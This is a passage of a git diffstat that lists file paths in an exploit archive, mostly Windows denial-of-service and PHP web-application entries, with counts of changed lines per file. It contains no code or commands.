+- exploits/php/webapps/42615.txt | 2 +- exploits/php/webapps/42618.txt | 2 +- exploits/php/webapps/42637.txt | 2 +- exploits/php/webapps/42640.txt | 2 +- exploits/php/webapps/42643.txt | 2 +- exploits/php/webapps/42717.txt | 2 +- exploits/php/webapps/42754.txt | 2 +- exploits/php/webapps/42755.txt | 2 +- exploits/php/webapps/42959.py | 2 +- exploits/php/webapps/42968.txt | 2 +- exploits/php/webapps/42971.rb | 2 +- exploits/php/webapps/42979.txt | 2 +- exploits/php/webapps/42980.txt | 2 +- exploits/php/webapps/42981.txt | 2 +- exploits/php/webapps/42982.txt | 2 +- exploits/php/webapps/42983.txt | 2 +- exploits/php/webapps/43027.txt | 2 +- exploits/php/webapps/43043.txt | 4 +- exploits/php/webapps/43063.txt | 2 +- exploits/php/webapps/43066.txt | 2 +- exploits/php/webapps/43072.txt | 2 +- exploits/php/webapps/43073.txt | 2 +- exploits/php/webapps/43075.txt | 2 +- exploits/php/webapps/43081.txt | 2 +- exploits/php/webapps/43082.txt | 2 +- exploits/php/webapps/43087.txt | 2 +- exploits/php/webapps/43099.txt | 2 +- exploits/php/webapps/43101.txt | 2 +- exploits/php/webapps/43106.txt | 5 +- exploits/php/webapps/43108.txt | 8 +- exploits/php/webapps/43128.txt | 2 +- exploits/php/webapps/43474.rb | 2 +- exploits/php/webapps/46776.txt | 2 +- exploits/php/webapps/46959.txt | 3 +- exploits/php/webapps/47431.txt | 2 +- exploits/php/webapps/47553.md | 2 +- exploits/php/webapps/4841.txt | 2 +- exploits/php/webapps/48457.txt | 2 +- exploits/php/webapps/49606.py | 2 +- exploits/php/webapps/50825.py | 530 ++++++++++++------------ exploits/php/webapps/6733.txt | 2 +- exploits/php/webapps/697.c | 2 +- exploits/php/webapps/7421.txt | 2 +- exploits/php/webapps/897.cpp | 2 +- exploits/php/webapps/9835.txt | 4 +- exploits/php/webapps/9839.txt | 2 +- exploits/php/webapps/9840.txt | 2 +- exploits/php/webapps/9880.txt | 11 +- exploits/php/webapps/9922.txt | 5 +- exploits/python/webapps/43021.py | 4 +- exploits/python/webapps/47879.md | 2 +- exploits/solaris/dos/28911.txt | 2 +- exploits/solaris/local/23874.txt | 2 +- exploits/solaris/remote/19696.c | 2 +- exploits/solaris/remote/21097.txt | 2 +- exploits/solaris/remote/5282.txt | 2 +- exploits/unix/dos/20376.txt | 2 +- exploits/unix/local/19904.txt | 2 +- exploits/unix/remote/19722.txt | 2 +- exploits/unix/remote/20512.txt | 2 +- exploits/unix/remote/20879.txt | 2 +- exploits/unix/remote/21314.txt | 2 +- exploits/unix/remote/21574.txt | 2 +- exploits/unix/remote/21579.txt | 2 +- exploits/unix/remote/22085.txt | 2 +- exploits/unix/remote/22471.txt | 2 +- exploits/unix/remote/24067.c | 6 +- exploits/unix/remote/25625.c | 5 +- exploits/unix/remote/27992.txt | 2 +- exploits/unix/remote/32811.txt | 2 +- exploits/unix/remote/40347.txt | 2 +- exploits/watchos/dos/47158.txt | 2 +- exploits/windows/dos/10204.txt | 2 +- exploits/windows/dos/10208.txt | 2 +- exploits/windows/dos/10343.txt | 4 +- exploits/windows/dos/11062.txt | 2 +- exploits/windows/dos/11064.txt | 2 +- exploits/windows/dos/11149.c | 2 +- exploits/windows/dos/11176.txt | 2 +- exploits/windows/dos/11182.txt | 2 +- exploits/windows/dos/11192.txt | 2 +- exploits/windows/dos/11245.txt | 2 +- exploits/windows/dos/11247.txt | 2 +- exploits/windows/dos/11342.txt | 2 +- exploits/windows/dos/11632.txt | 2 +- exploits/windows/dos/11639.txt | 2 +- exploits/windows/dos/11803.txt | 2 +- exploits/windows/dos/12080.txt | 2 +- exploits/windows/dos/13872.txt | 2 +- exploits/windows/dos/13887.c | 2 +- exploits/windows/dos/13888.c | 3 +- exploits/windows/dos/13919.c | 2 +- exploits/windows/dos/13959.txt | 2 +- exploits/windows/dos/14286.txt | 2 +- exploits/windows/dos/14346.txt | 2 +- exploits/windows/dos/14349.html | 5 +- exploits/windows/dos/14414.txt | 2 +- exploits/windows/dos/14424.txt | 2 +- exploits/windows/dos/14593.html | 2 +- exploits/windows/dos/14642.txt | 2 +- exploits/windows/dos/14671.py | 2 +- exploits/windows/dos/14683.py | 5 +- exploits/windows/dos/14767.txt | 2 +- exploits/windows/dos/14882.txt | 2 +- exploits/windows/dos/14883.txt | 2 +- exploits/windows/dos/14892.py | 3 +- exploits/windows/dos/14937.py | 3 +- exploits/windows/dos/14949.py | 2 +- exploits/windows/dos/14971.py | 2 +- exploits/windows/dos/14974.txt | 2 +- exploits/windows/dos/14992.py | 2 +- exploits/windows/dos/15019.txt | 2 +- exploits/windows/dos/15027.py | 2 +- exploits/windows/dos/15034.txt | 2 +- exploits/windows/dos/15065.txt | 2 +- exploits/windows/dos/15076.py | 2 +- exploits/windows/dos/15088.txt | 2 +- exploits/windows/dos/15096.py | 2 +- exploits/windows/dos/15104.py | 2 +- exploits/windows/dos/15148.txt | 2 +- exploits/windows/dos/15158.py | 2 +- exploits/windows/dos/15248.txt | 2 +- exploits/windows/dos/15259.txt | 2 +- exploits/windows/dos/15260.txt | 2 +- exploits/windows/dos/15407.txt | 2 +- exploits/windows/dos/15408.html | 4 +- exploits/windows/dos/15419.txt | 2 +- exploits/windows/dos/15426.txt | 2 +- exploits/windows/dos/15429.txt | 6 +- exploits/windows/dos/15444.txt | 2 +- exploits/windows/dos/15514.txt | 2 +- exploits/windows/dos/15581.txt | 2 +- exploits/windows/dos/15698.html | 2 +- exploits/windows/dos/15992.txt | 2 +- exploits/windows/dos/16120.py | 3 +- exploits/windows/dos/16121.py | 6 +- exploits/windows/dos/1615.txt | 2 +- exploits/windows/dos/16230.py | 2 +- exploits/windows/dos/16254.txt | 2 +- exploits/windows/dos/16255.pl | 2 +- exploits/windows/dos/17019.txt | 2 +- exploits/windows/dos/17023.txt | 30 +- exploits/windows/dos/17025.txt | 18 +- exploits/windows/dos/17032.txt | 2 +- exploits/windows/dos/17045.py | 2 +- exploits/windows/dos/17071.py | 4 +- exploits/windows/dos/17074.py | 4 +- exploits/windows/dos/17075.py | 4 +- exploits/windows/dos/1708.txt | 2 +- exploits/windows/dos/17142.py | 4 +- exploits/windows/dos/17143.py | 4 +- exploits/windows/dos/17159.txt | 2 +- exploits/windows/dos/17160.txt | 2 +- exploits/windows/dos/17161.txt | 2 +- exploits/windows/dos/17162.txt | 2 +- exploits/windows/dos/17163.txt | 2 +- exploits/windows/dos/17164.txt | 2 +- exploits/windows/dos/17274.txt | 2 +- exploits/windows/dos/17287.mid | 2 +- exploits/windows/dos/17398.txt | 2 +- exploits/windows/dos/17399.txt | 2 +- exploits/windows/dos/17405.txt | 2 +- exploits/windows/dos/17421.py | 2 +- exploits/windows/dos/17497.txt | 2 +- exploits/windows/dos/17544.txt | 2 +- exploits/windows/dos/17712.txt | 2 +- exploits/windows/dos/17772.txt | 2 +- exploits/windows/dos/17795.py | 4 +- exploits/windows/dos/1781.txt | 2 +- exploits/windows/dos/1782.txt | 2 +- exploits/windows/dos/1783.txt | 2 +- exploits/windows/dos/17830.txt | 2 +- exploits/windows/dos/17835.txt | 2 +- exploits/windows/dos/17836.txt | 2 +- exploits/windows/dos/17837.txt | 2 +- exploits/windows/dos/17838.txt | 2 +- exploits/windows/dos/17839.txt | 2 +- exploits/windows/dos/1784.txt | 2 +- exploits/windows/dos/17841.txt | 2 +- exploits/windows/dos/17842.txt | 6 +- exploits/windows/dos/17843.txt | 2 +- exploits/windows/dos/17844.txt | 4 +- exploits/windows/dos/17878.txt | 2 +- exploits/windows/dos/17879.txt | 2 +- exploits/windows/dos/17885.txt | 4 +- exploits/windows/dos/17889.txt | 2 +- exploits/windows/dos/17896.txt | 2 +- exploits/windows/dos/17903.txt | 2 +- exploits/windows/dos/17918.txt | 2 +- exploits/windows/dos/1792.txt | 2 +- exploits/windows/dos/17929.txt | 2 +- exploits/windows/dos/17930.txt | 2 +- exploits/windows/dos/17931.txt | 2 +- exploits/windows/dos/17963.txt | 4 +- exploits/windows/dos/17964.txt | 2 +- exploits/windows/dos/17965.txt | 2 +- exploits/windows/dos/17978.txt | 2 +- exploits/windows/dos/18049.txt | 2 +- exploits/windows/dos/18078.txt | 2 +- exploits/windows/dos/18112.txt | 2 +- exploits/windows/dos/18165.txt | 2 +- exploits/windows/dos/18166.txt | 4 +- exploits/windows/dos/18196.py | 6 +- exploits/windows/dos/18256.txt | 2 +- exploits/windows/dos/18257.txt | 2 +- exploits/windows/dos/18461.html | 3 +- exploits/windows/dos/18481.py | 3 +- exploits/windows/dos/18488.txt | 2 +- exploits/windows/dos/18489.txt | 2 +- exploits/windows/dos/18490.txt | 2 +- exploits/windows/dos/18491.txt | 2 +- exploits/windows/dos/18512.txt | 2 +- exploits/windows/dos/18586.txt | 2 +- exploits/windows/dos/18602.txt | 2 +- exploits/windows/dos/18606.txt | 2 +- exploits/windows/dos/18633.txt | 2 +- exploits/windows/dos/18661.txt | 2 +- exploits/windows/dos/18739.txt | 2 +- exploits/windows/dos/18765.txt | 2 +- exploits/windows/dos/18771.txt | 2 +- exploits/windows/dos/18774.txt | 2 +- exploits/windows/dos/18776.txt | 2 +- exploits/windows/dos/18795.py | 3 +- exploits/windows/dos/18864.txt | 2 +- exploits/windows/dos/18878.txt | 2 +- exploits/windows/dos/18894.txt | 2 +- exploits/windows/dos/18952.txt | 2 +- exploits/windows/dos/18964.txt | 2 +- exploits/windows/dos/18972.txt | 2 +- exploits/windows/dos/19089.txt | 2 +- exploits/windows/dos/19181.txt | 2 +- exploits/windows/dos/19182.txt | 2 +- exploits/windows/dos/19183.txt | 2 +- exploits/windows/dos/19289.txt | 2 +- exploits/windows/dos/19331.txt | 2 +- exploits/windows/dos/19332.txt | 2 +- exploits/windows/dos/19333.txt | 2 +- exploits/windows/dos/19334.txt | 2 +- exploits/windows/dos/19335.txt | 2 +- exploits/windows/dos/19336.txt | 2 +- exploits/windows/dos/19337.txt | 2 +- exploits/windows/dos/19338.txt | 2 +- exploits/windows/dos/19385.txt | 2 +- exploits/windows/dos/19409.txt | 2 +- exploits/windows/dos/19445.txt | 2 +- exploits/windows/dos/19456.txt | 2 +- exploits/windows/dos/19483.txt | 2 +- exploits/windows/dos/19578.txt | 2 +- exploits/windows/dos/19619.txt | 4 +- exploits/windows/dos/19624.txt | 4 +- exploits/windows/dos/19636.txt | 6 +- exploits/windows/dos/19639.txt | 4 +- exploits/windows/dos/19664.txt | 2 +- exploits/windows/dos/19711.txt | 4 +- exploits/windows/dos/19725.txt | 2 +- exploits/windows/dos/19755.txt | 4 +- exploits/windows/dos/19760.txt | 4 +- exploits/windows/dos/19807.txt | 6 +- exploits/windows/dos/19810.txt | 4 +- exploits/windows/dos/19827.txt | 4 +- exploits/windows/dos/19856.txt | 4 +- exploits/windows/dos/19907.txt | 4 +- exploits/windows/dos/19960.txt | 2 +- exploits/windows/dos/19961.txt | 2 +- exploits/windows/dos/19962.txt | 2 +- exploits/windows/dos/20016.py | 2 +- exploits/windows/dos/20017.py | 2 +- exploits/windows/dos/20219.txt | 2 +- exploits/windows/dos/20254.txt | 2 +- exploits/windows/dos/20255.txt | 2 +- exploits/windows/dos/2039.pl | 2 +- exploits/windows/dos/20783.txt | 2 +- exploits/windows/dos/20828.txt | 2 +- exploits/windows/dos/20834.txt | 2 +- exploits/windows/dos/20930.c | 2 +- exploits/windows/dos/20946.txt | 2 +- exploits/windows/dos/20971.txt | 2 +- exploits/windows/dos/21006.txt | 2 +- exploits/windows/dos/21040.txt | 2 +- exploits/windows/dos/21047.txt | 2 +- exploits/windows/dos/21123.txt | 2 +- exploits/windows/dos/21171.c | 2 +- exploits/windows/dos/21240.txt | 2 +- exploits/windows/dos/21389.txt | 2 +- exploits/windows/dos/21419.txt | 4 +- exploits/windows/dos/21612.txt | 2 +- exploits/windows/dos/21645.txt | 2 +- exploits/windows/dos/21741.txt | 2 +- exploits/windows/dos/21747.txt | 2 +- exploits/windows/dos/21789.txt | 2 +- exploits/windows/dos/21909.txt | 2 +- exploits/windows/dos/21943.c | 2 +- exploits/windows/dos/21953.txt | 2 +- exploits/windows/dos/21954.txt | 2 +- exploits/windows/dos/22132.txt | 2 +- exploits/windows/dos/22215.txt | 2 +- exploits/windows/dos/22239.txt | 2 +- exploits/windows/dos/22310.txt | 2 +- exploits/windows/dos/22330.txt | 2 +- exploits/windows/dos/22395.txt | 2 +- exploits/windows/dos/22402.txt | 2 +- exploits/windows/dos/22420.txt | 2 +- exploits/windows/dos/22464.txt | 2 +- exploits/windows/dos/22591.txt | 2 +- exploits/windows/dos/22655.txt | 2 +- exploits/windows/dos/22679.txt | 2 +- exploits/windows/dos/22680.txt | 2 +- exploits/windows/dos/22681.txt | 2 +- exploits/windows/dos/22850.txt | 2 +- exploits/windows/dos/22855.txt | 2 +- exploits/windows/dos/22878.txt | 4 +- exploits/windows/dos/22899.txt | 2 +- exploits/windows/dos/23107.txt | 2 +- exploits/windows/dos/23201.txt | 2 +- exploits/windows/dos/23246.txt | 2 +- exploits/windows/dos/23288.txt | 2 +- exploits/windows/dos/23469.txt | 2 +- exploits/windows/dos/23496.txt | 2 +- exploits/windows/dos/23686.txt | 2 +- exploits/windows/dos/23846.txt | 2 +- exploits/windows/dos/24135.html | 5 +- exploits/windows/dos/24178.txt | 2 +- exploits/windows/dos/24463.txt | 2 +- exploits/windows/dos/24586.txt | 2 +- exploits/windows/dos/24708.txt | 2 +- exploits/windows/dos/24726.txt | 2 +- exploits/windows/dos/24743.txt | 2 +- exploits/windows/dos/24962.txt | 2 +- exploits/windows/dos/25007.txt | 2 +- exploits/windows/dos/25140.txt | 2 +- exploits/windows/dos/25255.txt | 2 +- exploits/windows/dos/25680.txt | 2 +- exploits/windows/dos/25699.txt | 2 +- exploits/windows/dos/25712.txt | 2 +- exploits/windows/dos/25737.txt | 2 +- exploits/windows/dos/25991.txt | 2 +- exploits/windows/dos/25992.txt | 4 +- exploits/windows/dos/26450.pl | 2 +- exploits/windows/dos/26457.txt | 2 +- exploits/windows/dos/26869.txt | 4 +- exploits/windows/dos/27047.txt | 2 +- exploits/windows/dos/27049.txt | 2 +- exploits/windows/dos/27050.txt | 2 +- exploits/windows/dos/27051.txt | 2 +- exploits/windows/dos/27055.txt | 4 +- exploits/windows/dos/27069.txt | 2 +- exploits/windows/dos/27090.c | 2 +- exploits/windows/dos/27476.txt | 2 +- exploits/windows/dos/27745.txt | 2 +- exploits/windows/dos/27850.txt | 2 +- exploits/windows/dos/27971.txt | 2 +- exploits/windows/dos/28050.txt | 2 +- exploits/windows/dos/28087.txt | 2 +- exploits/windows/dos/28222.txt | 2 +- exploits/windows/dos/28227.txt | 2 +- exploits/windows/dos/28343.txt | 2 +- exploits/windows/dos/28381.txt | 2 +- exploits/windows/dos/28469.txt | 2 +- exploits/windows/dos/28588.txt | 2 +- exploits/windows/dos/28880.txt | 2 +- exploits/windows/dos/28894.txt | 2 +- exploits/windows/dos/29148.txt | 2 +- exploits/windows/dos/29172.txt | 2 +- exploits/windows/dos/2922.txt | 2 +- exploits/windows/dos/29285.txt | 2 +- exploits/windows/dos/29286.txt | 2 +- exploits/windows/dos/29287.txt | 2 +- exploits/windows/dos/29618.c | 150 ------- exploits/windows/dos/29660.txt | 2 +- exploits/windows/dos/29664.txt | 2 +- exploits/windows/dos/29707.txt | 2 +- exploits/windows/dos/29738.txt | 2 +- exploits/windows/dos/29743.txt | 2 +- exploits/windows/dos/30160.txt | 2 +- exploits/windows/dos/30208.txt | 2 +- exploits/windows/dos/30255.txt | 2 +- exploits/windows/dos/30462.py | 4 +- exploits/windows/dos/30500.txt | 2 +- exploits/windows/dos/30512.txt | 2 +- exploits/windows/dos/30544.txt | 2 +- exploits/windows/dos/30590.txt | 2 +- exploits/windows/dos/30619.txt | 2 +- exploits/windows/dos/30672.txt | 2 +- exploits/windows/dos/30934.txt | 2 +- exploits/windows/dos/31122.txt | 2 +- exploits/windows/dos/312.txt | 2 +- exploits/windows/dos/31300.txt | 2 +- exploits/windows/dos/31301.txt | 2 +- exploits/windows/dos/31310.txt | 2 +- exploits/windows/dos/31330.txt | 2 +- exploits/windows/dos/31338.txt | 2 +- exploits/windows/dos/31360.txt | 4 +- exploits/windows/dos/31361.txt | 2 +- exploits/windows/dos/31363.txt | 2 +- exploits/windows/dos/31381.txt | 2 +- exploits/windows/dos/31399.txt | 2 +- exploits/windows/dos/31461.txt | 2 +- exploits/windows/dos/31563.txt | 2 +- exploits/windows/dos/31629.txt | 2 +- exploits/windows/dos/31696.txt | 2 +- exploits/windows/dos/31707.txt | 2 +- exploits/windows/dos/31899.txt | 2 +- exploits/windows/dos/31934.txt | 8 +- exploits/windows/dos/32573.txt | 2 +- exploits/windows/dos/32939.txt | 2 +- exploits/windows/dos/33056.pl | 2 +- exploits/windows/dos/33707.txt | 2 +- exploits/windows/dos/33710.txt | 2 +- exploits/windows/dos/33711.txt | 2 +- exploits/windows/dos/33770.txt | 2 +- exploits/windows/dos/33849.txt | 2 +- exploits/windows/dos/33977.txt | 2 +- exploits/windows/dos/3399.txt | 2 +- exploits/windows/dos/34093.txt | 2 +- exploits/windows/dos/34151.txt | 2 +- exploits/windows/dos/34158.txt | 2 +- exploits/windows/dos/3419.txt | 2 +- exploits/windows/dos/34227.txt | 2 +- exploits/windows/dos/34251.txt | 2 +- exploits/windows/dos/34355.txt | 2 +- exploits/windows/dos/34698.txt | 2 +- exploits/windows/dos/35217.txt | 2 +- exploits/windows/dos/35804.txt | 2 +- exploits/windows/dos/35873.txt | 2 +- exploits/windows/dos/35895.txt | 2 +- exploits/windows/dos/36128.txt | 2 +- exploits/windows/dos/36211.txt | 2 +- exploits/windows/dos/36334.txt | 2 +- exploits/windows/dos/36335.txt | 2 +- exploits/windows/dos/36336.txt | 2 +- exploits/windows/dos/36405.txt | 2 +- exploits/windows/dos/36443.txt | 2 +- exploits/windows/dos/36788.txt | 2 +- exploits/windows/dos/3690.txt | 2 +- exploits/windows/dos/3693.txt | 2 +- exploits/windows/dos/37346.txt | 2 +- exploits/windows/dos/37347.txt | 2 +- exploits/windows/dos/37348.txt | 2 +- exploits/windows/dos/37843.txt | 2 +- exploits/windows/dos/37844.txt | 2 +- exploits/windows/dos/37845.txt | 2 +- exploits/windows/dos/37846.txt | 2 +- exploits/windows/dos/37847.txt | 2 +- exploits/windows/dos/37848.txt | 2 +- exploits/windows/dos/37849.txt | 2 +- exploits/windows/dos/37853.txt | 2 +- exploits/windows/dos/37854.txt | 2 +- exploits/windows/dos/37856.txt | 2 +- exploits/windows/dos/37857.txt | 2 +- exploits/windows/dos/37858.txt | 2 +- exploits/windows/dos/37860.txt | 2 +- exploits/windows/dos/37861.txt | 2 +- exploits/windows/dos/37862.txt | 2 +- exploits/windows/dos/37875.txt | 2 +- exploits/windows/dos/37883.txt | 2 +- exploits/windows/dos/37884.txt | 2 +- exploits/windows/dos/37909.txt | 2 +- exploits/windows/dos/37910.txt | 2 +- exploits/windows/dos/37911.txt | 2 +- exploits/windows/dos/37912.txt | 2 +- exploits/windows/dos/37913.txt | 2 +- exploits/windows/dos/37914.txt | 2 +- exploits/windows/dos/37915.txt | 2 +- exploits/windows/dos/37916.txt | 2 +- exploits/windows/dos/37917.txt | 2 +- exploits/windows/dos/37918.txt | 2 +- exploits/windows/dos/37919.txt | 2 +- exploits/windows/dos/37920.txt | 2 +- exploits/windows/dos/37921.txt | 2 +- exploits/windows/dos/37922.txt | 2 +- exploits/windows/dos/37923.txt | 2 +- exploits/windows/dos/37924.txt | 2 +- exploits/windows/dos/37966.txt | 2 +- exploits/windows/dos/37967.txt | 2 +- exploits/windows/dos/38214.txt | 2 +- exploits/windows/dos/38215.txt | 2 +- exploits/windows/dos/38216.txt | 2 +- exploits/windows/dos/38217.txt | 2 +- exploits/windows/dos/38272.txt | 2 +- exploits/windows/dos/38281.txt | 2 +- exploits/windows/dos/38282.txt | 2 +- exploits/windows/dos/38283.txt | 2 +- exploits/windows/dos/38284.txt | 2 +- exploits/windows/dos/38285.txt | 2 +- exploits/windows/dos/38286.txt | 2 +- exploits/windows/dos/38288.txt | 2 +- exploits/windows/dos/38344.txt | 2 +- exploits/windows/dos/38348.txt | 2 +- exploits/windows/dos/38485.py | 2 +- exploits/windows/dos/38580.txt | 2 +- exploits/windows/dos/38701.txt | 2 +- exploits/windows/dos/38702.txt | 2 +- exploits/windows/dos/38703.txt | 2 +- exploits/windows/dos/38713.txt | 2 +- exploits/windows/dos/38714.txt | 2 +- exploits/windows/dos/38735.txt | 2 +- exploits/windows/dos/38736.txt | 2 +- exploits/windows/dos/38761.py | 2 +- exploits/windows/dos/38787.txt | 2 +- exploits/windows/dos/38788.txt | 2 +- exploits/windows/dos/38789.txt | 2 +- exploits/windows/dos/38793.txt | 2 +- exploits/windows/dos/38794.txt | 2 +- exploits/windows/dos/38795.txt | 2 +- exploits/windows/dos/38796.txt | 2 +- exploits/windows/dos/38858.txt | 2 +- exploits/windows/dos/38934.txt | 2 +- exploits/windows/dos/39019.txt | 2 +- exploits/windows/dos/39020.txt | 2 +- exploits/windows/dos/39021.txt | 2 +- exploits/windows/dos/39022.txt | 2 +- exploits/windows/dos/39025.txt | 2 +- exploits/windows/dos/39040.txt | 2 +- exploits/windows/dos/39041.txt | 2 +- exploits/windows/dos/39042.txt | 2 +- exploits/windows/dos/39044.txt | 2 +- exploits/windows/dos/39045.txt | 2 +- exploits/windows/dos/39046.txt | 2 +- exploits/windows/dos/39047.txt | 2 +- exploits/windows/dos/39048.txt | 2 +- exploits/windows/dos/39049.txt | 2 +- exploits/windows/dos/39050.txt | 2 +- exploits/windows/dos/39051.txt | 2 +- exploits/windows/dos/39052.txt | 2 +- exploits/windows/dos/39053.txt | 2 +- exploits/windows/dos/39054.txt | 2 +- exploits/windows/dos/39055.txt | 2 +- exploits/windows/dos/39056.txt | 2 +- exploits/windows/dos/39220.txt | 2 +- exploits/windows/dos/39232.txt | 2 +- exploits/windows/dos/39233.txt | 2 +- exploits/windows/dos/39275.txt | 2 +- exploits/windows/dos/39330.txt | 2 +- exploits/windows/dos/39353.txt | 2 +- exploits/windows/dos/39393.txt | 2 +- exploits/windows/dos/39395.txt | 2 +- exploits/windows/dos/39396.txt | 2 +- exploits/windows/dos/39397.txt | 2 +- exploits/windows/dos/39398.txt | 2 +- exploits/windows/dos/39403.py | 2 +- exploits/windows/dos/39428.txt | 2 +- exploits/windows/dos/39429.txt | 2 +- exploits/windows/dos/39430.txt | 2 +- exploits/windows/dos/39431.txt | 2 +- exploits/windows/dos/39444.txt | 2 +- exploits/windows/dos/39509.txt | 2 +- exploits/windows/dos/39512.txt | 2 +- exploits/windows/dos/39518.txt | 2 +- exploits/windows/dos/39530.txt | 2 +- exploits/windows/dos/39533.txt | 2 +- exploits/windows/dos/39546.txt | 2 +- exploits/windows/dos/39560.txt | 2 +- exploits/windows/dos/39561.txt | 2 +- exploits/windows/dos/39600.txt | 2 +- exploits/windows/dos/39601.txt | 2 +- exploits/windows/dos/39602.txt | 2 +- exploits/windows/dos/39603.txt | 2 +- exploits/windows/dos/39605.txt | 2 +- exploits/windows/dos/39606.txt | 2 +- exploits/windows/dos/39608.txt | 2 +- exploits/windows/dos/39609.txt | 2 +- exploits/windows/dos/39610.txt | 2 +- exploits/windows/dos/39611.txt | 2 +- exploits/windows/dos/39612.txt | 2 +- exploits/windows/dos/39613.txt | 2 +- exploits/windows/dos/39647.txt | 2 +- exploits/windows/dos/39648.txt | 2 +- exploits/windows/dos/39743.txt | 2 +- exploits/windows/dos/39770.txt | 2 +- exploits/windows/dos/39778.txt | 2 +- exploits/windows/dos/39779.txt | 2 +- exploits/windows/dos/39819.txt | 2 +- exploits/windows/dos/39832.txt | 2 +- exploits/windows/dos/39833.txt | 2 +- exploits/windows/dos/39959.txt | 2 +- exploits/windows/dos/39960.txt | 2 +- exploits/windows/dos/39990.txt | 2 +- exploits/windows/dos/39991.txt | 2 +- exploits/windows/dos/40255.txt | 2 +- exploits/windows/dos/40256.txt | 2 +- exploits/windows/dos/40257.txt | 2 +- exploits/windows/dos/40398.txt | 2 +- exploits/windows/dos/40399.txt | 2 +- exploits/windows/dos/40406.txt | 2 +- exploits/windows/dos/40411.txt | 2 +- exploits/windows/dos/4044.txt | 2 +- exploits/windows/dos/40508.txt | 2 +- exploits/windows/dos/40509.txt | 2 +- exploits/windows/dos/40598.txt | 2 +- exploits/windows/dos/40599.txt | 2 +- exploits/windows/dos/40600.txt | 2 +- exploits/windows/dos/40601.txt | 2 +- exploits/windows/dos/40617.txt | 2 +- exploits/windows/dos/40656.txt | 2 +- exploits/windows/dos/40657.txt | 2 +- exploits/windows/dos/40658.txt | 2 +- exploits/windows/dos/40659.txt | 2 +- exploits/windows/dos/40661.txt | 2 +- exploits/windows/dos/40662.txt | 2 +- exploits/windows/dos/40663.txt | 2 +- exploits/windows/dos/40664.txt | 2 +- exploits/windows/dos/40665.txt | 2 +- exploits/windows/dos/40666.txt | 2 +- exploits/windows/dos/40667.txt | 2 +- exploits/windows/dos/40668.txt | 2 +- exploits/windows/dos/40744.txt | 2 +- exploits/windows/dos/40745.c | 2 +- exploits/windows/dos/40766.txt | 2 +- exploits/windows/dos/41025.txt | 2 +- exploits/windows/dos/4121.txt | 2 +- exploits/windows/dos/41222.py | 2 +- exploits/windows/dos/41363.txt | 2 +- exploits/windows/dos/41364.txt | 2 +- exploits/windows/dos/41365.txt | 2 +- exploits/windows/dos/41367.txt | 4 +- exploits/windows/dos/41417.txt | 2 +- exploits/windows/dos/41418.txt | 2 +- exploits/windows/dos/41419.txt | 2 +- exploits/windows/dos/41474.py | 2 +- exploits/windows/dos/41645.txt | 2 +- exploits/windows/dos/41646.txt | 2 +- exploits/windows/dos/41647.txt | 2 +- exploits/windows/dos/41648.txt | 2 +- exploits/windows/dos/41649.txt | 2 +- exploits/windows/dos/41650.txt | 2 +- exploits/windows/dos/41651.txt | 2 +- exploits/windows/dos/41652.txt | 2 +- exploits/windows/dos/41653.txt | 2 +- exploits/windows/dos/41654.txt | 2 +- exploits/windows/dos/41655.txt | 2 +- exploits/windows/dos/41656.txt | 2 +- exploits/windows/dos/41657.txt | 2 +- exploits/windows/dos/41658.txt | 2 +- exploits/windows/dos/41659.txt | 2 +- exploits/windows/dos/41661.html | 2 +- exploits/windows/dos/41737.txt | 5 +- exploits/windows/dos/41756.txt | 2 +- exploits/windows/dos/41879.txt | 2 +- exploits/windows/dos/42009.txt | 2 +- exploits/windows/dos/42021.txt | 2 +- exploits/windows/dos/42081.txt | 2 +- exploits/windows/dos/42088.txt | 2 +- exploits/windows/dos/42092.txt | 2 +- exploits/windows/dos/42214.txt | 2 +- exploits/windows/dos/42230.txt | 2 +- exploits/windows/dos/42234.txt | 2 +- exploits/windows/dos/42235.txt | 2 +- exploits/windows/dos/42236.txt | 2 +- exploits/windows/dos/42237.txt | 2 +- exploits/windows/dos/42238.txt | 2 +- exploits/windows/dos/42239.txt | 2 +- exploits/windows/dos/42240.txt | 2 +- exploits/windows/dos/42241.txt | 2 +- exploits/windows/dos/42243.txt | 2 +- exploits/windows/dos/42264.txt | 2 +- exploits/windows/dos/42480.txt | 2 +- exploits/windows/dos/42741.cpp | 2 +- exploits/windows/dos/42742.cpp | 2 +- exploits/windows/dos/42744.txt | 2 +- exploits/windows/dos/42746.txt | 2 +- exploits/windows/dos/42747.cpp | 2 +- exploits/windows/dos/42749.cpp | 2 +- exploits/windows/dos/42750.cpp | 2 +- exploits/windows/dos/42758.txt | 2 +- exploits/windows/dos/42763.html | 2 +- exploits/windows/dos/42764.html | 2 +- exploits/windows/dos/42917.py | 2 +- exploits/windows/dos/42962.py | 2 +- exploits/windows/dos/42994.txt | 4 +- exploits/windows/dos/42995.txt | 2 +- exploits/windows/dos/42997.txt | 2 +- exploits/windows/dos/43001.cpp | 2 +- exploits/windows/dos/43026.py | 3 +- exploits/windows/dos/43058.c | 7 +- exploits/windows/dos/43060.py | 2 +- exploits/windows/dos/43124.py | 4 +- exploits/windows/dos/4335.txt | 2 +- exploits/windows/dos/43373.txt | 2 +- exploits/windows/dos/43446.txt | 2 +- exploits/windows/dos/43515.txt | 2 +- exploits/windows/dos/43516.txt | 2 +- exploits/windows/dos/43517.txt | 2 +- exploits/windows/dos/4375.txt | 2 +- exploits/windows/dos/44096.txt | 2 +- exploits/windows/dos/44402.txt | 2 +- exploits/windows/dos/44466.txt | 2 +- exploits/windows/dos/44467.txt | 2 +- exploits/windows/dos/44914.txt | 2 +- exploits/windows/dos/44915.txt | 2 +- exploits/windows/dos/45435.txt | 2 +- exploits/windows/dos/45436.txt | 2 +- exploits/windows/dos/45624.txt | 2 +- exploits/windows/dos/46022.txt | 2 +- exploits/windows/dos/46023.txt | 2 +- exploits/windows/dos/46184.txt | 2 +- exploits/windows/dos/47028.txt | 2 +- exploits/windows/dos/47029.txt | 2 +- exploits/windows/dos/47084.txt | 2 +- exploits/windows/dos/47086.txt | 2 +- exploits/windows/dos/47087.txt | 2 +- exploits/windows/dos/47088.txt | 2 +- exploits/windows/dos/47089.txt | 2 +- exploits/windows/dos/47090.txt | 2 +- exploits/windows/dos/47091.txt | 2 +- exploits/windows/dos/47092.txt | 2 +- exploits/windows/dos/47093.txt | 2 +- exploits/windows/dos/47094.txt | 2 +- exploits/windows/dos/47095.txt | 2 +- exploits/windows/dos/47096.txt | 2 +- exploits/windows/dos/47097.txt | 2 +- exploits/windows/dos/47098.txt | 2 +- exploits/windows/dos/47099.txt | 2 +- exploits/windows/dos/47100.txt | 2 +- exploits/windows/dos/47101.txt | 2 +- exploits/windows/dos/47102.txt | 2 +- exploits/windows/dos/47103.txt | 2 +- 